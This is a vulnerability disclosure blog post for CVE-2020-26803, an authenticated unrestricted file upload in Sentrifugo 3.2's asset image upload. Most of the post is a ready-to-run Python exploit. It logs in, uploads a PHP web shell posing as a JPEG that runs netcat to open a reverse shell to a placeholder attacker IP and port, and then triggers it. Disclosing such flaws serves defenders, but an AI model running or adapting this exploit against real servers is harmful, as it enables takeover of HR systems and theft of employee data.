Sentrifugo Version 3.2 –> RCE [Authenticated] (assets) | CVE-2020-26803

Software: https://sourceforge.net/projects/sentrifugo/Version: 3.2 Vulnerability: Unrestricted File UploadCVE: CVE-2020-26803Exploit-DB: https://www.exploit-db.com/exploits/48997
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs…Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In Sentrifugo web application, users can upload an image under “Assets -> Add” tab.  This “Upload Images” functionality is suffered from “Unrestricted File Upload” vulnerability so attacker can upload malicious files using this functionality and control the server.

I wrote an exploit to demonstrate the vulnerability. You need to change hardcoded values before running the exploit.

Exploit:import requestsfrom bs4 import BeautifulSoupfrom ast import literal_eval
”’You should change the below hardcoded inputs to get a reverse shell.”’
login_url = “http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave”upload_url = “http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave”call_shell = “http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/”username = “xxxx”password = “xxxx”
attacker_ip = “XXX.XXX.XXX.XXX”listener_port = “4444”
# Set proxy for debugging purposes
proxy = {“http”: “http://XXX.XXX.XXX.XXX:8080”}
# Log in to the system
session = requests.Session()request = session.get(login_url)body = {“username”:username,”password”:password}# session.post(login_url, data=body, proxies=proxy) session.post(login_url, data=body) # Send a request without proxyprint(“Logged in to the application..”)
# Upload the PHP shellfiles = [    (‘myfile’,         (‘shell.php’,        ‘<?php system(\’nc.traditional {} {} -e /bin/bash\’); ?>’.format(attacker_ip,listener_port),        ‘image/jpeg’)    )]# r = session.post(upload_url, files=files, proxies=proxy)r = session.post(upload_url, files=files) # Send a request without proxyresponse = r.contentdict_str = response.decode(“UTF-8”)response = literal_eval(dict_str) # Convert bytes to dictionaryfilename = response[“filedata”][“new_name”]url = call_shell + filenameprint(“PHP file is uploaded –> {}”.format(url))
# Trigger the shell
session.get(url)

Leave a Comment